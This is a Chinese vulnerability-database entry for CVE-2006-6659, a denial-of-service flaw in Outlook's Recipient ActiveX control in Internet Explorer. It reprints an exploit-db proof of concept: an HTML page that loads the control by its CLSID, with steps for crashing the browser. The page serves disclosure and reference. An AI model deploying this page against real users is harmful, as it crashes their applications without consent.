Microsoft Outlook ActiveX控件远程Internet Explorer拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111786 漏洞类型 其他
发布时间 2006-12-18 更新时间 2006-12-21
CVE编号 CVE-2006-6659 CNNVD-ID CNNVD-200612-420
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/29295
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-420
|漏洞详情
MicrosoftOutlook是美国微软(Microsoft)公司的一款Office套件中所捆绑的电子邮件客户端软件。该软件可管理电子邮件、联系人和日历等。MicrosoftOutlook的Recipient控件(ole32.dll)存在拒绝服务漏洞。如果用户受骗打开了恶意的HTML邮件的话,就会导致InternetExplorer或其他使用该ActiveX控件的应用程序崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/21649/info

The Microsoft Office Outlook Recipient Control is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to trigger denial-of-service conditions in Internet Explorer or other applications that use the ActiveX control.

Specific information regarding affected packages is currently unavailable. This BID will be updated as more information becomes available.

<!--
------------------------------------------------------------------------
Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service
author: shinnai
site: http://shinnai.altervista.org
mail: shinnai[at]autistici[dot]org
and, always, special thanks to rgod

Tested on Windows Xp Professional SP2 all patched

works with Internet Explorer 6 & 7
------------------------------------------------------------------------
-->

<html>
 <head>
 <title></title>
 </head>
 <object classid="clsid:0006F023-0000-0000-C000-000000000046" id="oLook" width="180" height="14"></object>
</html>

<!--
Just enable the control by clicking on it, then try to close IE.
-->
|参考资料

来源:BID
名称:21649
链接:http://www.securityfocus.com/bid/21649
来源:MISC
链接:http://shinnai.altervista.org/viewtopic.php?id=41&t_id=8
来源:SECTRACK
名称:1017397
链接:http://securitytracker.com/id?1017397